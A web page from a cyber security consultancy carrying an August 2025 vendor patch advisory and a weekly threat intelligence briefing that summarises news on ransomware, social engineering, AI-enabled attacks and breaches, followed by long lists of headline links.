· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can to keep you and your business secure.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory - 13 August 2025 - Security Updates from Microsoft, Adobe, SAP, Fortinet and Ivanti
Executive Summary
August’s Patch Tuesday delivers substantial updates across enterprise platforms. Microsoft addresses 107 vulnerabilities—including one zero-day and 13 critical flaws—spanning Windows, Office, and server products. Adobe issues multiple bulletins for Commerce, InCopy, and FrameMaker. SAP releases 15 Security Notes for enterprise systems. Fortinet publishes critical advisories for Security Fabric, FGFM, and SSL-VPN components. Ivanti provides three updates for its secure gateway products. Immediate patching is advised, particularly for critical RCE and privilege-escalation vulnerabilities.
Vulnerabilities by Vendor
Microsoft[¹]: 107 vulnerabilities addressed, including one publicly disclosed zero-day and 13 critical flaws. Patching is advised across Windows, Office, SQL Server, and other widespread components.
Adobe[²]: At least 19 vulnerabilities in Adobe Commerce, InCopy, and FrameMaker. Focus should be on critical arbitrary code execution fixes.
SAP[³]: 15 Security Notes affecting S/4HANA, Business Suite, and other SAP platforms. HotNews and high-priority advisories should be applied first.
Fortinet[⁴]: Three advisories dated 12 August 2025—covering Security Fabric privilege issues, FGFM authentication weaknesses (in FortiOS/FortiProxy/FortiPAM), and an SSL-VPN integer-overflow DoS vulnerability.
Ivanti[⁵]: Three product-specific advisories on August Patch Tuesday — for Connect Secure, Policy Secure, and ZTA Gateways — focused on gateway access and authentication security.
What’s the risk to me or my business?
The presence of actively exploited zero-days and critical RCE/privilege-escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation’s security policies and ensure that all systems are running supported and up-to-date software versions.
Footnotes:
¹ Microsoft — August 2025 Security Update Release Notes: https://msrc.microsoft.com/update-guide/releaseNote/2025-Aug
² Adobe — Adobe Product Security Bulletin: https://helpx.adobe.com/security/security-bulletin.html
³ SAP — SAP Security Patch Day August 2025: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/august-2025.html
⁴ Fortinet Security Advisories: https://www.fortiguard.com/psirt
⁵ Ivanti August 2025 Security Advisory: https://forums.ivanti.com/s/article/August-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-Multiple-CVEs?language=en_US
Black Arrow Cyber Threat Intelligence Briefing 08 August 2025
Black Arrow Cyber Threat Intelligence Briefing 08 August 2025:
-AI Can Plan and Execute Cyber Attacks Without Human Intervention
-Ransomware Gangs Attacking Managed Service Providers with Stolen Login Credentials and Vulnerabilities
-Hackers Use Social Engineering Attack to Gain Remote Access in 5 Minutes
-Social Engineering Attacks Surged This Past Year
-Ransomware Actors Expand Tactics Beyond Encryption and Exfiltration
-Cyber Criminals Are Getting Personal, and It’s Working
-Ransomware Victims Are Still Paying Up, Some More Than Once
-SMBs Struggle with Alert Overload, Cloud Blind Spots and Insider Threats
-Britons Face Cyber-Attack Surge as UK Becomes Most Targeted Country in Europe
-Exposed Without a Breach - The Cost of Data Blindness
-Cyber Insurance Premiums Are Soaring — And So Are Your Risks
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week, we start with insights into the evolving tactics of attackers. A study has shown how AI can plan and execute complex cyber attacks without human intervention, while other attackers are using stolen credentials and vulnerabilities to gain access to managed service providers. Social engineering attacks have surged over the past year, with attackers able to access their target’s corporate systems within 5 minutes. Once they are in, the attackers are expanding their tactics beyond encryption and exfiltration, and victims continue to pay the ransom demands.
We also report that the UK is the third most targeted country globally, behind the US and Canada, and we highlight the challenges facing small and medium sized businesses in particular. We also highlight that cyber incidents do not only happen as part of an attack; they also occur when data is vulnerable due to mismanaged systems and accesses. As all these risks increase, we also highlight the potential value of cyber insurance as part of a robust and planned cyber security strategy.
Top Cyber Stories of the Last Week
AI Can Plan and Execute Cyber Attacks Without Human Intervention
A recent study from Carnegie Mellon University, in collaboration with Anthropic, has demonstrated the growing capabilities of AI in cyber security. The research showed that large language models (LLMs) can autonomously plan and execute complex cyber attacks, such as replicating the 2017 Equifax breach, without any human intervention. The AI functioned as the planner, delegating tasks to sub-agents, and managed to deploy malware and extract data. While this work was conducted in a controlled environment, it raises significant concerns about the potential for AI-driven cyber attacks. These developments signal a shift towards more autonomous and adaptive threats.
Ransomware Gangs Attacking Managed Service Providers with Stolen Login Credentials and Vulnerabilities
Ransomware groups Akira and Lynx are increasingly targeting managed service providers (MSPs) and small businesses, exploiting stolen credentials and vulnerabilities. These groups have compromised over 365 organisations, with Akira evolving into one of the top 10 ransomware operations, focusing on MSPs to access extensive client networks. Both groups utilise techniques such as credential-based attacks, file encryption and data theft to extort ransoms. They share similarities with the notorious Conti ransomware, indicating potential code reuse. The attacks also involve evasion tactics such as disabling security software and targeting backup systems to ensure successful encryption.
https://cybersecuritynews.com/akira-and-lynx-ransomware/
Hackers Use Social Engineering Attack to Gain Remote Access in 5 Minutes
A recent cyber attack investigation demonstrated how threat actors compromised corporate systems in under five minutes using social engineering and trusted business tools. Hackers impersonated IT support to gain remote access via QuickAssist, then deployed malicious PowerShell scripts to install a remote access tool and harvest credentials. The attack, which leveraged legitimate Windows tools, highlights the growing risk of social engineering tactics in bypassing security. The incident underscores the need for improved user training and prompt incident response to mitigate the impact of such rapid breaches.
https://cybersecuritynews.com/hacked-in-300-seconds/
Social Engineering Attacks Surged This Past Year
Palo Alto Networks’ latest report reveals that social engineering attacks have become the leading method for cyber attacks over the past year, with 36% of the incident response cases traced back to this tactic. These attacks, used by a variety of groups, including financially motivated cyber criminals and nation-state operatives, often target employees with system-wide access, such as help desk staff and administrators. Social engineering is particularly effective in compromising sensitive data, with 60% of such attacks leading to data exposure. The report highlights that these attacks have spiked in frequency, especially from groups like Scattered Spider and North Korean operatives.
https://cyberscoop.com/social-engineering-top-attack-vector-unit-42/
Ransomware Actors Expand Tactics Beyond Encryption and Exfiltration
A recent Barracuda report reveals that ransomware actors have expanded their tactics beyond data encryption and exfiltration. Other common activities included wiping backups or deleting shadow copies of files (37%), installing additional malware or payloads (29%), infecting multiple endpoints such as computers or servers (26%), and threatening partners, shareholders, or customers (22%). Attackers also threatened to alert the authorities or the press (21%) and even threatened staff (16%). Only a quarter (24%) of incidents involved data encryption. Data was stolen and either leaked or retained in 54% of cases. These multidimensional tactics increase pressure on victims to pay.
https://www.infosecurity-magazine.com/news/ransomware-expand-encryption/
Cyber Criminals Are Getting Personal, and It’s Working
Cyber criminals are increasingly personalising their attacks, with phishing kits becoming harder to detect and reverse-engineer. A key tactic involves using custom-made kits, driven by AI, to scale campaigns. Email-based attacks continue to rise, with business email compromise (BEC) becoming a prominent threat. Lumma Stealer malware is the most prevalent, often delivered through common file attachments or cloud services. Financial lures and urgency-based messages remain the top tactics used to trick victims, with cyber criminals employing sophisticated methods to bypass detection. The growing use of AI is enabling more targeted and scalable phishing efforts.
https://www.helpnetsecurity.com/2025/08/07/email-attacks-q2-2025/
Ransomware Victims Are Still Paying Up, Some More Than Once
A recent report from Semperis reveals that ransomware attacks remain a significant threat, with 81% of US firms and 78% globally targeted in the past year. Attackers succeed in over half of cases, and many companies pay ransoms multiple times. The majority of payments range between $500,000 and $1 million, but some companies face repeated attacks. The report highlights the growing risk of identity infrastructure breaches, including Active Directory and Okta, which enable attackers to persist and escalate their reach. Organisations are urged to automate defences, secure identity systems, and prepare comprehensive ransomware-response plans.
SMBs Struggle with Alert Overload, Cloud Blind Spots and Insider Threats
TrustLayer’s 2025 UK Cyber Resilience Report reveals a growing challenge for UK SMBs in managing cyber security. With shrinking budgets and rising alert volumes, organisations struggle to protect against email, cloud, and insider threats. The report highlights critical gaps, including limited cloud visibility, outdated security tools, and insider risks, with nearly one in three data breaches originating from employees. Additionally, alert overload is leading to stress and burnout in security teams. TrustLayer recommends streamlining security tools, automating processes, and focusing on human-centric operations to build a more resilient, efficient cyber security strategy.
Britons Face Cyber-Attack Surge as UK Becomes Most Targeted Country in Europe
The UK has seen a significant rise in cyber attacks, making it the third most targeted country globally, behind the US and Canada. According to a NordVPN report, there has been a 7% increase in malware incidents, totalling 103 million, with the UK having the highest malware concentration per user in Europe. Cyber criminals often use trusted brands like Google, Amazon, and Yahoo to deceive users into exposing sensitive data. Malware now includes a wide range of threats, from data theft to device hijacking. The rise in online scams and increasingly sophisticated techniques highlights growing cyber security risks for UK businesses and consumers.
Exposed Without a Breach - The Cost of Data Blindness
Data blindness, where sensitive information is exposed without traditional cyber attack methods, poses a significant risk to organisations. This occurs when misconfigured systems, overpermissioned users, and unmonitored data flows leave critical data vulnerable. Traditional tools fail to account for modern data environments, where information is scattered across cloud platforms, third-party services, and AI-generated content. As a result, visibility gaps lead to unnoticed breaches, with the consequences often as severe as a traditional cyber attack. To mitigate this, organisations must adopt continuous, real-time data visibility, ensuring sensitive data is always monitored and aligned with business context.
https://securityaffairs.com/180813/security/exposed-without-a-breach-the-cost-of-data-blindness.html
Cyber Insurance Premiums Are Soaring — And So Are Your Risks
The global cyber insurance market is set to grow rapidly, doubling by 2030, driven by rising cyber risks such as ransomware and stringent regulatory requirements like GDPR and NIS2. As cyber attacks become more frequent and costly, businesses are increasingly relying on insurance as a safety net. Insurers are adjusting by incorporating real-time threat intelligence to price policies more accurately. Firms should consider the appropriateness of their cyber insurance to protect client data and manage cyber risks effectively. It is critical for firms to review their policies and ensure adequate coverage.
https://abovethelaw.com/2025/08/cyber-insurance-premiums-are-soaring-and-so-are-your-risks/
Governance, Risk and Compliance
CISOs say they're prepared, their data says otherwise - Help Net Security
Why 90% of cyber leaders are feeling the heat - Help Net Security
Cybersecurity must be a top priority for businesses from beginning to end | TechRadar
Mind the overconfidence gap: CISOs and staff don’t see eye to eye on security posture | CSO Online
75 percent of cybersecurity leaders don’t trust their own data - BetaNews
The Heat Wasn't Just Outside: Cyber Attacks Spiked in Summer 2025
Summer: Why cybersecurity must be strengthened as vacations abound | CSO Online
Cybersecurity Incident Response Needs A War Room, Not A Playbook
Prioritizing Cybersecurity: Essential for Business Survival Against AI Threats
Threats
Ransomware, Extortion and Destructive Attacks
Nearly one-third of ransomware victims are hit multiple times, even after paying hackers | IT Pro
New EDR killer tool used by eight different ransomware groups
Ransomware groups shift to quadruple extortion to maximize pressure - Help Net Security
75% of UK business leaders are willing to risk criminal penalties to pay ransoms | IT Pro
Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security
Ransomware goes cloud native to target your backup infrastructure | CSO Online
Ransomware Actors Expand Tactics Beyond Encryption and Exfiltration - Infosecurity Magazine
On the Rise: Ransomware Victims, Breaches, Infostealers
This devious ransomware is able to hijack your system to turn off Microsoft Defender | TechRadar
Akira Ransomware Exploits SonicWall VPNs in Likely Zero-Day Attack on Fully-Patched Devices
Ransomware Surges as Attempts Spike 146%
Nimble 'Gunra' Ransomware Evolves With Linux Variant
Storm-2603 Deploys DNS-Controlled Backdoor in Warlock and LockBit Ransomware Attacks
Ransomware gangs join attacks targeting Microsoft SharePoint servers
Study: 78% of Companies Targeted with Ransomware
Ransomware-as-a-Service Economy - Trends, Targets & Takedowns
Ransomware attacks: The evolving extortion threat to US financial institutions | CSO Online
Akira ransomware abuses CPU tuning tool to disable Microsoft Defender
Royal and BlackSuit ransomware gangs hit over 450 US companies
Qilin Ransomware Affiliate Panel Login Credentials Exposed Online – DataBreaches.Net
SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others
Countering the Threat of Ransomware as a Service
Why we shouldn’t just repeat ransomware groups’ claims, Sunday edition – DataBreaches.Net
Authorities seize BlackSuit ransomware gang's servers | TechCrunch
Ransomware Victims
Ransomware attacks cripple government services across Dutch Caribbean islands | NL Times
Ransomware plunges insurance company into bankruptcy | Fortra
SBM investigates alleged cyber incident amid claims of reputational threat - NEWS.MC - Monaco News
Phishing & Email Based Attacks
Cybercriminals are getting personal, and it's working - Help Net Security
Attackers exploit link-wrapping services to steal Microsoft 365 logins
Phishers Abuse M365 'Direct Send' to Spoof Internal Users
Mozilla warns Firefox add-on devs of new phishing attacks • The Register
Other Social Engineering
Cybercriminals are getting personal, and it's working - Help Net Security
Social engineering attacks surged this past year, Palo Alto Networks report finds | CyberScoop
Hackers Use Social Engineering Attack to Gain Remote Access in 300 Seconds
Gen Z in the Crosshairs: Cybercriminals Shift Focus to Young, Digital-Savvy Workers - SecurityWeek
QR Code Quishing Attacks Surge 50%: Protect Against Data Theft
CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Cisco Victim of Voice Phishing Attack, Customer Data Stolen
How not to hire a North Korean IT spy | CSO Online
Indeed recruiter text scam: I responded to one of the “job” messages. It got weird quickly.
Fraud, Scams and Financial Crime
Experts Alarmed by UK Government’s Companies House ID Checks - Infosecurity Magazine
Scammers abusing WhatsApp group invites | Cybernews
Fraud controls don’t guarantee consumer trust - Help Net Security
Indeed recruiter text scam: I responded to one of the “job” messages. It got weird quickly.
AI Fuels Record Number of Fraud Cases - Infosecurity Magazine
Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop
Artificial Intelligence
9 things you shouldn't use AI for at work | ZDNET
Your employees uploaded over a gig of files to GenAI tools last quarter - Help Net Security
CrowdStrike: Threat Actors Increasingly Lean on AI Tools
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Russian Cyber Threat Group Uses AI-Guided Malware
Financial sector faced most AI-powered cyberattacks: survey
Rising Mobile Browser Attacks: AI Threats and Key Defenses
AI Guardrails Under Fire: Cisco's Jailbreak Demo Exposes AI Weak Points - SecurityWeek
Cybersecurity Pros Say IoT, Large Language Models Are Risk Areas of Concern
AI can write your code, but nearly half of it may be insecure - Help Net Security
Security Researchers Just Hacked ChatGPT Using A Single 'Poisoned' Document
AI Fuels Record Number of Fraud Cases - Infosecurity Magazine
Vibe Coding: When Everyone’s a Developer, Who Secures the Code? - SecurityWeek
NIST seeks to avoid reinventing the wheel with AI security guidance
Prioritizing Cybersecurity: Essential for Business Survival Against AI Threats
What's keeping risk leaders up at night? AI, tariffs, and cost cuts - Help Net Security
42% of Developers Using AI Say Their Codebase is Now Mostly AI-Generated
Anthropic wants to stop AI models from turning evil - here's how | ZDNET
Claude Vulnerabilities Let Attackers Execute Unauthorized Commands With its Own Help
Gemini AI Promptware Attack Exploits Calendar Invites to Hijack Smart Homes
Malware
On the Rise: Ransomware Victims, Breaches, Infostealers
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Russian Cyber Threat Group Uses AI-Guided Malware
SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others
Staggering 800% Rise in Infostealer Credential Theft - Infosecurity Magazine
New 'Shade BIOS' Technique Beats Every Kind of Security
New Undetectable Plague Malware Attacking Linux Servers to Gain Persistent SSH Access
Antivirus vendors fail to spot persistent Linux backdoor • The Register
Python-powered malware grabs 200K passwords, credit cards • The Register
CISA releases malware analysis for Sharepoint Server attack • The Register
Fake WhatsApp developer libraries hide destructive data-wiping code
Wave of 150 crypto-draining extensions hits Firefox add-on store
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign
Mobile
Rising Mobile Browser Attacks: AI Threats and Key Defenses
PlayPraetor Android Trojan Infects 11,000+ Devices via Fake Google Play Pages and Meta Ads
Google addresses six vulnerabilities in August’s Android security update | CyberScoop
PlayPraetor Android RAT expands rapidly across Spanish and French-speaking regions
France orders officials to drop foreign messaging apps over cybersecurity fears
Internet of Things – IoT
Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security
Cybersecurity Pros Say IoT, Large Language Models Are Risk Areas of Concern
The humble printer highlights overlooked security flaws | CIO Dive
Gemini AI Promptware Attack Exploits Calendar Invites to Hijack Smart Homes
Data Breaches/Leaks
On the Rise: Ransomware Victims, Breaches, Infostealers
Legal aid cyber-attack has pushed sector towards collapse, say lawyers | Legal aid | The Guardian
Google says hackers stole its customers' data by breaching its Salesforce database | TechCrunch
Exposed Without a Breach: The Cost of Data Blindness
Cisco Victim of Voice Phishing Attack, Customer Data Stolen
Top MoD civil servant to leave in wake of Afghan data breach - BBC News
Average global data breach cost now $4.44 million - Help Net Security
Swipe Right for a Cyberattack: Dating Sites, EV Chargers, and Sex Toys
No, 16 Billion New User Credentials Weren’t Leaked—but the Risk Remains | Proofpoint US
Allianz faces fresh lawsuit as cyberattack exposes 1.4 million records | Insurance Business America
Bouygues Telecom Data Breach Exposes 6.4 Million Customer Records - Infosecurity Magazine
Air France and KLM disclosed data breaches following the hack of a third-party platform
Chanel and Pandora latest retailers to be hit by cyber attacks | Retail Week
Pandora confirms data breach amid ongoing Salesforce data theft attacks
Allianz Life cyberattack gets worse as company confirms Social Security numbers stolen | TechRadar
Lovense flaws expose emails and allow account takeover
PBS confirms data breach after employee info leaked on Discord servers
Despite data breaches like the Tea app, companies see little consequence - The Washington Post
Florida prison exposes visitor contact info to every inmate • The Register
Organised Crime & Criminal Actors
Cybercriminals are getting personal, and it's working - Help Net Security
Why the Old Ways Are Still the Best for Most Cybercriminals
From fake CAPTCHAs to RATs: Inside 2025's cyber deception threat trends - Help Net Security
Python-powered malware grabs 200K passwords, credit cards • The Register
Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally
Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop
Countering the Threat of Ransomware as a Service
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Wave of 150 crypto-draining extensions hits Firefox add-on store
Insider Risk and Insider Threats
Your employees uploaded over a gig of files to GenAI tools last quarter - Help Net Security
CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop
Laptop Farm: What It Is & How It's Used, Explained
How not to hire a North Korean IT spy | CSO Online
Insurance
Cyber Insurance Premiums Are Soaring — And So Are Your Risks - Above the Law
Supply Chain and Third Parties
Air France and KLM disclosed data breaches following the hack of a third-party platform
Chanel and Pandora latest retailers to be hit by cyber attacks | Retail Week
Pandora confirms data breach amid ongoing Salesforce data theft attacks
Cloud/SaaS
Google says hackers stole its customers' data by breaching its Salesforce database | TechCrunch
Attackers exploit link-wrapping services to steal Microsoft 365 logins
Ransomware goes cloud native to target your backup infrastructure | CSO Online
Phishers Abuse M365 'Direct Send' to Spoof Internal Users
How the UK's cloud strategy was hijacked by a hyperscaler duopoly | Computer Weekly
New Microsoft Exchange Vulnerability Puts Hybrid Cloud Environments at Risk - Infosecurity Magazine
Outages
Identity and Access Management
Privilege Escalation Issue in Amazon ECS Leads to IAM Hijacking
Encryption
Encryption Made for Police and Military Radios May Be Easily Cracked | WIRED
Linux and Open Source
New Linux backdoor Plague bypasses auth via malicious PAM module
New Undetectable Plague Malware Attacking Linux Servers to Gain Persistent SSH Access
Antivirus vendors fail to spot persistent Linux backdoor • The Register
New malware avoids antivirus detection, unleashes a "plague" on your devices | TechRadar
Nimble 'Gunra' Ransomware Evolves With Linux Variant
Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW
Lansweeper finds Linux is growing on business endpoints • The Register
Yes, you need a firewall on Linux - here's why and which to use | ZDNET
Passwords, Credential Stuffing & Brute Force Attacks
Attackers exploit link-wrapping services to steal Microsoft 365 logins
Python-powered malware grabs 200K passwords, credit cards • The Register
Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally
Staggering 800% Rise in Infostealer Credential Theft - Infosecurity Magazine
Hackers Steal 1.8 Billion Credentials, 9 Billion Data Records
Social Media
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Amnesty slams X for 'central role' in fueling UK violence • The Register
Instagram lets you see your friends' locations now, and vice versa - here's how | ZDNET
Malvertising
PlayPraetor Android Trojan Infects 11,000+ Devices via Fake Google Play Pages and Meta Ads
SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others
Regulations, Fines and Legislation
Europe’s Cybersecurity Puzzle: NIS2 Progress in 30 Pieces | McDermott Will & Schulte - JDSupra
75% of UK business leaders are willing to risk criminal penalties to pay ransoms | IT Pro
The VPNs allowing youngsters to bypass UK age verification rules
One Week of the Online Safety Act: Cyber Experts Weigh In - IT Security Guru
'Can I see some ID?' As online age verification spreads, so do privacy concerns | CBC News
The Cyber Security and Resilience Bill | Technology Law Dispatch
CISA, USCG make example out of organization they audited • The Register
Former and current officials clash over CISA’s role in US cyber defenses at Black Hat - Nextgov/FCW
Senate confirms national cyber director pick Sean Cairncross | CyberScoop
Annual ODPA report highlights local Data Law adequacy - Bailiwick Express News Guernsey
Illumina Settles Allegations of Cyber Vulnerabilities in Genomic Sequencing for $9.8M
America Is Blinding Itself - by Mark Hertling - The Bulwark
US Agencies Fail IT Security Audits, Jeopardizing National Security
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
Models, Frameworks and Standards
Europe’s Cybersecurity Puzzle: NIS2 Progress in 30 Pieces | McDermott Will & Schulte - JDSupra
The Cyber Security and Resilience Bill | Technology Law Dispatch
NIST seeks to avoid reinventing the wheel with AI security guidance
NCSC Updates Cyber Assessment Framework to Build UK CNI Resilience - Infosecurity Magazine
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
Careers, Working in Cyber and Information Security
How CISOs are training the next generation of cyber leaders | CSO Online
The Five Steps to Increase UK Cyber Resilience Detailed | SC Media UK
5 hard truths of a career in cybersecurity — and how to navigate them | CSO Online
Law Enforcement Action and Take Downs
Details emerge on BlackSuit ransomware takedown | CyberScoop
Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
NATO condemns Russian cyber activities
Europe must adapt to Russia's hybrid cyber war
Pro-Iran Hackers Aligned Cyber with Kinetic War Aims - Infosecurity Magazine
Iranian hackers were more coordinated, aligned during Israel conflict than it seemed | CyberScoop
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign
Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan
Nation State Actors
China
Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW
Storm-2603 Deploys DNS-Controlled Backdoor in Warlock and LockBit Ransomware Attacks
China’s botched Great Firewall upgrade invites attacks • The Register
Chinese Nation-State Hackers Breach Southeast Asian Telecoms
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign
Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan
Why an explosive fight erupted over the UK's new Chinese embassy - BBC News
Chinese cyberattack on US nuclear agency highlights importance of cyber hygiene | The Strategist
Nvidia says its chips have no 'backdoors' after China raises concerns | Fox Business
China Says US Exploited Old Microsoft Flaw for Cyberattacks - Bloomberg
Russia
NATO condemns Russian cyber activities
Europe must adapt to Russia's hybrid cyber war
Russian Cyber Threat Group Uses AI-Guided Malware
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
Ukrainian drone attacks are causing blackouts and shutdowns for Russian mobile internet | TechRadar
Iran
Pro-Iran Hackers Aligned Cyber with Kinetic War Aims - Infosecurity Magazine
Iranian hackers were more coordinated, aligned during Israel conflict than it seemed | CyberScoop
North Korea
CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop
Laptop Farm: What It Is & How It's Used, Explained
Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW
Tools and Controls
Cyber Insurance Premiums Are Soaring — And So Are Your Risks - Above the Law
AI can write your code, but nearly half of it may be insecure - Help Net Security
New EDR killer tool used by eight different ransomware groups
75 percent of cybersecurity leaders don’t trust their own data - BetaNews
One Week of the Online Safety Act: Cyber Experts Weigh In - IT Security Guru
Privilege Escalation Issue in Amazon ECS Leads to IAM Hijacking
Ransomware goes cloud native to target your backup infrastructure | CSO Online
Exposed Without a Breach: The Cost of Data Blindness
The humble printer highlights overlooked security flaws | CIO Dive
What's keeping risk leaders up at night? AI, tariffs, and cost cuts - Help Net Security
Fraud controls don’t guarantee consumer trust - Help Net Security
Akira ransomware abuses CPU tuning tool to disable Microsoft Defender
Mind the overconfidence gap: CISOs and staff don’t see eye to eye on security posture | CSO Online
CISOs say they're prepared, their data says otherwise - Help Net Security
Misconfigurations Are Not Vulnerabilities: The Costly Confusion Behind Security Risks
Vibe Coding: When Everyone’s a Developer, Who Secures the Code? - SecurityWeek
China’s botched Great Firewall upgrade invites attacks • The Register
Cybersecurity Incident Response Needs A War Room, Not A Playbook
Yes, you need a firewall on Linux - here's why and which to use | ZDNET
Reports Published in the Last Week
Other News
Man-in-the-Middle Attack Prevention Guide
MacOS Under Attack: How Organizations Can Counter Rising Threats
Strengthening the UK's data center infrastructure | TechRadar
Councils are the weak link in UK cyber defences
Cyberattacks Making Consumers More Cautious About Online Shopping
Energy companies are blind to thousands of exposed services - Help Net Security
UK Boosts Cybersecurity Budget to Shield Critical Infrastructure
UK Ministry of Defence to bolster troops’ cyber skills | Cybernews
Monaco fights back after cybercriminals target national icons - NEWS.MC - Monaco News
Why blow up satellites when you can just hack them? • The Register
Vulnerability Management
Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security
The Critical Flaw in CVE Scoring
Exposed Without a Breach: The Cost of Data Blindness
Misconfigurations Are Not Vulnerabilities: The Costly Confusion Behind Security Risks
AI Beats Hackers to a Zero-Day Cybersecurity Discovery, Twice
Microsoft’s Update Mistake—45% Of All Windows Users Now At Risk
US Agencies Fail IT Security Audits, Jeopardizing National Security
Vulnerabilities
New Microsoft Exchange Vulnerability Puts Hybrid Cloud Environments at Risk - Infosecurity Magazine
Akira Ransomware Exploits SonicWall VPNs in Likely Zero-Day Attack on Fully-Patched Devices
Google fixed two Qualcomm bugs that were actively exploited in the wild
Android's August 2025 Update Patches Exploited Qualcomm Vulnerability - SecurityWeek
Enterprise Secrets Exposed by CyberArk Conjur Vulnerabilities - SecurityWeek
Google addresses six vulnerabilities in August’s Android security update | CyberScoop
CISA releases malware analysis for Sharepoint Server attack • The Register
Ransomware gangs join attacks targeting Microsoft SharePoint servers
Apple iOS 18.6 Update Patches 29 Security Flaws, Fixes Exploited WebKit Bug
Adobe issues emergency fixes for AEM Forms zero-days after PoCs released
Millions of Dell PCs with Broadcom chips open to attack • The Register
New Ghost Calls tactic abuses Zoom and Microsoft Teams for C2 operations
RCE Flaw in AI Coding Tool Poses Software Supply Chain Risk
Vibe coding tool Cursor allows persistent code execution • The Register
Trend Micro fixes two actively exploited Apex One RCE flaws
Akira ransomware abuses CPU tuning tool to disable Microsoft Defender
Proton fixes Authenticator bug leaking TOTP secrets in logs
Critical Vulnerabilities Found in NVIDIA's Triton Inference Server - Infosecurity Magazine
Adobe Issues Out-of-Band Patches for AEM Forms Vulnerabilities With Public PoC - SecurityWeek
Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan
China: US spies used Microsoft Exchange 0-day to steal info • The Register
Nvidia Patches Critical RCE Vulnerability Chain
CISA Adds 3 D-Link Vulnerabilities to KEV Catalog Amid Active Exploitation Evidence
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 01 August 2025
Black Arrow Cyber Threat Intelligence Briefing 01 August 2025:
-HR Documents Appear in 82% of All Data Breaches
-Scattered Spider Ransomware Group Infiltrating Slack and Microsoft Teams to Target Vulnerable Employees
-Gen Z Falls for Scams 2x More Than Older Generations
-Millions Hit in Quishing Attacks as Malicious QR Codes Surge
-Ransomware Attacks Escalate to Physical Threats Against Executives
-Ransomware Up 179%, Credential Theft Up 800%: 2025’s Cyber Threat Landscape Intensifies
-New Chaos Ransomware Emerges, Launches Wave of Attacks
-Seychelles Commercial Bank Reported Cyber Security Incident
-Third of Exploited Vulnerabilities Weaponised Within a Day of Disclosure
-Sam Altman Warns That AI Is About to Cause a Massive "Fraud Crisis" in Which Anyone Can Perfectly Imitate Anyone Else
-Getting a Cyber Security Vibe Check on Vibe Coding
-The Growing Impact of AI and Quantum on Cyber Security
